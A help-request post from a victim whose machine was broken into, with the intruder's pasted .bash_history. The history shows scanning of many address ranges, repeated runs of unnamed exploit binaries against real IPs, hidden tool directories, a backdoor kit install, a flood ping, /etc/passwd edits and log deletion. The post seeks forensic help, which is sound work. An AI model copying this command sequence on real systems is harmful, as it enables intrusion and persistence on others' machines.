Can someone help me figure out this
"/.bash_history" from my
computer that someone cracked into and did some
damage.
I'll probably re-install the box, but I'd like to
see what they did
before I destroy it. I've attached the
"/.bash_history".
Dzuy
|
w ifconfig ls -la logout exit id who ping yahoo.com who finger uname -a ls -la cd / ls cd root ls logout exit w traceroute 193.254.35.18 home cd .dead cd home cd .dead ls mkdir.dead mkdir .dead cd .dead cc anatomy.c -o anatomy cc kod.c -o kofd cp kofd kod rm kofd ./anatomy 216.209.196.154 22 ./anatomy 216.209.205.68 22 ./anatomy 216.209.207.150 22 cd home cd .dead who ls tar -zxvf bnc2_6_4_tar.gz cd bnc2.6.4 ./configure make ls make install make cd home cd httpd cd icons cd small cd .shit mkdir small cd small mkdir .shit cd .shit who chmod 777 * chmod +s * chmod 666 * chmod 777 * ./pscan ./b ./pscan 167.64 111 ./pscan 206.252 111 cat wuftp.lo cat wuftp.log ./b 206.252.255.42 ./pscan 198.138 111 cat wuftp.log rm wuftp.log ./pscan 198.59 111 cat wuftp.log ./b 198.59.112.9 ./b 198.59.115.35 ./b 198.59.173.186 ./b 198.59.169.11 exit cd home cd .dead cd home cd httopd cd icons cd httpd cd iocns cd icons cd small cd .shit ./b www.telesync.com rm wuftp.log ./b www.cqhost.com ./pscan 195.54 111 cd home cd httpd cd icons cd small cd .shit cat wuftp.log ./b 195.54.2.162 rm wuftp.log ./pscan 195.54 ./pscan 195.54 111 cat wuftp.log ./b 195.54.3.134 ./b 195.54.29.7 ./b 195.54.221.21 rm wuftp.log ./b 206.132.34.52 ./pscan 206.132 111 cat wuftp.log ./b 206.132.219.119 ./b 206.132.219.170 rm wuftp.log ./pscan 209.0 111 cd home cd .dead cd .. cd httpd cd icons cd small cd .shit cat wuftp.log ping -f newsforlinux.com cd home cd httpd cd icons cd small cd .shit cd home cd httpd cd icons cd small cd .shit ./pscan 216.122 111 d home cd home cd httpd cd icons cd small cd .shit cat wuftp.log ./pscan 193.86 111 cat wuftp.log rm wuftp.log ./b 143.232.55.1 ./pscan 143.232 111 cd home cd httpd cd icons cd small cd .shit ./pscan 128.61 111 who cd home cd httpd c dicons cd small cd .shit cd icons cd samll cd .shit cd small cd .shit ./b 194.83.100.85 ./pscan 194.83 111 cat wuftp.log ./b 203.15.123.146 ./pscan 192.20 111 cd home cd httpd cd icons cd small cd ,.shit cd .shit ./b e150.135.112.129 ./b 150.135.112.129 d home cd home cd httpd cd icons cd small cd shit cd .shit ls cat wuftp.log ./b 139.78.100.200 ./pscan 139.78 111 cd home cd httpd cd icons cd small cd .shit who exit cd home cd httpd cd icons cd small cd .shit who cat wuftp.log ./b 216.156.219.216 ./b 199.109.4.21 ./pscan 199.109 111 ./pscan 172.16 111 ./pscan 192.55 111 cat wuftp.log ./b 192.55.203.135 rm wuftp.log ./pscan 129.98 111 ./pscan 192.153 111 cat wuftp.log ./pscan 134.241 111 ./b 142.169.8.215 cat wuftp.log ./pscan 204.116 111 cat wuftp.log ./b 204.116.30.166 ./b 204.116.104.205 ./b 204.116.202.5 rm wuftp.log ./pscan 192.203 111 cat wuftp.log ./b 192.203.80.149 ./b 192.203.80.144 ./b 192.203.80.142 ./b 192.203.130.28 rm wuftp.log ./pscan 199.17 111 cat wuftp.log ./pscan 208.7 111 cat wuftp.log ./pscan 137.165 111 ./pscan 209.56 111 cat wuftp.log ./pscan 204.185 111 cat wuftp.log ./b 204.185.56.250 ./b 204.185.91.12 rm wuftp.log ./pscan 205.238 111 cat wuftp.log ./b 205.238.205.10 ./b 205.238.238.112 rm wuftp.log ./pscan 156.26 111 cat wuftp.log ./b 156.26.120.34 rm wuftp.log ./pscan 206.243 111 cat wuftp.log ./pscan 192.204 111 cat wuftp.log ./pscan 140.211 111 cat wuftp.log ./pscan 192.207 111 cat wuftp.log exit ftp columbia.digiweb.com tar -zxvf linux.tar.gz cd .bd ./install cd home cd httpd cd icons cd msla cd small cd .shit rm wuftp.log ./pscan 161.6 111 cat wuftp.log ./pscan 152.30 111 cat wuftp.log ./pscan 208.31 111 cat wuftp.log ./pscan 129.133 111 cat wuftp.log ./pscan 149.130 111 cat wuftp.log ./pscan 199.234 111 cat wuftp.log ./pscan 208.135 111 cat wuftp.log ./b 208.135.205.67 rm wuftp.log ./pscan 204.171 111 cat wuftp.log ./pscan 198.247 111 cat wuftp.log ./b 198.247.5.164 ./pscan 199.199 111 cat wuftp.log rm wuftp.log ./pscan 198.150 111 cat wuftp.log ./b 198.150.93.205 telnet 198.150.93.205 rm wuftp.log ./pscan 150.174 111 ./pscan 208.27 111 cat wuftp.log uname -a cat /etc/passwd pico /ec/passwd cd /home ls -a cd .. ls -a car .bash_history cat .bash_history passwd z cat /etc/passwd cd home cd httpd cd icons cd small c d.shit cd .shit ls cat wuftp.log rm *.log ./pscan 155.42 111 uname -a who ./anatomy 212.1.128.61 22 /home/.dead/anatomy 212.1.128.61 22 whoami exit